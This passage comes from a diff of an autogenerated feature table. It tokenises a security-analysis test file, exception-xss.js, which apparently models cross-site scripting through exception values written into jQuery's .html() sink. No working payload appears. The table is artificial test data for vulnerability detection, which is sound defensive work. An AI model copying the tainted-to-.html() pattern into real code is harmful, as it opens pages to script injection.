x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:12:95:14 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:95:12:95:14 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:95:12:95:14 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:12:95:14 | foo | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:95:17:95:21 | "bar" | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:17:95:21 | "bar" | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:17:95:21 | "bar" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/exception-xss.js:95:17:95:21 | "bar" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/ExceptionXss/exception-xss.js:95:17:95:21 | "bar" | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:17:95:21 | "bar" | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:17:95:21 | "bar" | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:95:17:95:21 | "bar" | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:95:17:95:21 | "bar" | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:17:95:21 | "bar" | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:96:11:96:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:96:11:96:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:96:11:96:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:96:11:96:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:96:11:96:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:96:11:96:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:96:11:96:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:96:11:96:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:96:11:96:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:96:11:96:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:3 | $ | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:11 | $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:16 | $('myId').html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:19 | $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:3:97:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:97:5:97:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:97:5:97:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:97:5:97:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19076,6 +129295,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:97:5:97:10 | 'myId' | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:97:5:97:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:97:5:97:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:13:97:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:13:97:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:13:97:16 | html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:13:97:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:97:13:97:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:97:18:97:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:97:18:97:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:97:18:97:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19083,6 +129307,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:97:18:97:18 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:97:18:97:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:97:18:97:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:102:4:102:10 | unknown | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:102:4:102:10 | unknown | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:102:4:102:10 | unknown | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:102:4:102:10 | unknown | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:102:4:102:10 | unknown | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:102:4:102:15 | exceptional return of unknown(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:102:4:102:15 | exceptional return of unknown(foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:102:4:102:15 | exceptional return of unknown(foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:102:4:102:15 | exceptional return of unknown(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:102:4:102:15 | exceptional return of unknown(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:102:4:102:15 | unknown(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:102:4:102:15 | unknown(foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:102:4:102:15 | unknown(foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:102:4:102:15 | unknown(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:102:4:102:15 | unknown(foo) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:102:12:102:14 | foo | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:102:12:102:14 | foo | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:102:12:102:14 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19090,6 +129329,46 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:102:12:102:14 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:102:12:102:14 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:102:12:102:14 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:106:11:106:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:106:11:106:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:106:11:106:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:106:11:106:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:106:11:106:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:106:11:106:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:106:11:106:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:106:11:106:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:106:11:106:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:106:11:106:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:3 | $ | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:11 | $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:16 | $('myId').html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:19 | $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| 